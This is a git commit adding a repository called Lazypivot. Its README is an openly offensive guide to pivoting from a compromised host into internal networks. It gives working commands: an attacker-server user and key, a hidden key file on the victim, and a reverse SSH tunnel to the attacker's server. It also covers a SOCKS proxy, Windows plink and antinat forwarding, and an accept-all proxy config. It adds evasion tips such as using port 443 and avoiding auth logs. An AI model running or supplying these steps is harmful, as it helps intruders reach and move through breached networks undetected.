fast release

2019-12-14 19:54:14 +01:00 · 2019-12-14 19:54:14 +01:00 · 9807d3fcb5
commit 9807d3fcb5
7 changed files with 82 additions and 0 deletions
--- a/Readme.md
+++ b/Readme.md
@ -0,0 +1,61 @@
+# Lazypivot
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
+
+## Principles
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
+
+## Linux
+### Simpler
+On our server 
+```
+useradd -m -s /bin/nologin targetname
+ssh-keygen -t ecdsa -f /tmp/sshkey  -q -N ""
+mkdir /home/targetname/.ssh
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
+chown -R targetname:targetname /home/targetname/.ssh
+chmod 600 /home/targetname/.ssh/authorized_keys
+cat /tmp/sshkey
+```
+
+Copy the content of /tmp/sshkey
+
+On the compromised host
+
+```
+echo "my copied sshkey" >> /tmp/.keyfile
+chmod 600 /tmp/.keyfile
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
+```
+
+Now on your server
+
+```
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
+```
+
+### Stealthier
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
+
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
+## Windows
+
+Upload the package and extract it with 7z.exe.
+
+Start the antinat binary, no admin permissions are required:
+
+```
+antinat.exe -a -cantinat.xml
+```
+
+Forward the antinat port with plink:
+
+```
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
+```
+
+
+## Tips
+
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
--- a/linux/Readme.md
+++ b/linux/Readme.md
@ -0,0 +1 @@
+Antinat linux build TODO
--- a/windows/antinat.dll
+++ b/windows/antinat.dll
--- a/windows/antinat.exe
+++ b/windows/antinat.exe
--- a/windows/antinat.xml
+++ b/windows/antinat.xml
@ -0,0 +1,20 @@
+<?xml version='1.0'?>
+<antinatconfig>
+	<!-- Any interface -->
+	<interface value='127.0.0.1'/>
+
+	<!-- Port to listen on -->
+	<port value='32768'/>
+
+	<!-- What security methods do we offer clients? -->
+	<authchoice>
+		<select mechanism='anonymous'/>
+		<select mechanism='chap'/>
+		<select mechanism='cleartext'/>
+	</authchoice>
+
+	<!-- Which connections should we accept or reject? -->
+	<filter>
+		<accept/>
+	</filter>
+</antinatconfig>
--- a/windows/plink.exe
+++ b/windows/plink.exe
--- a/windows/upload.zip
+++ b/windows/upload.zip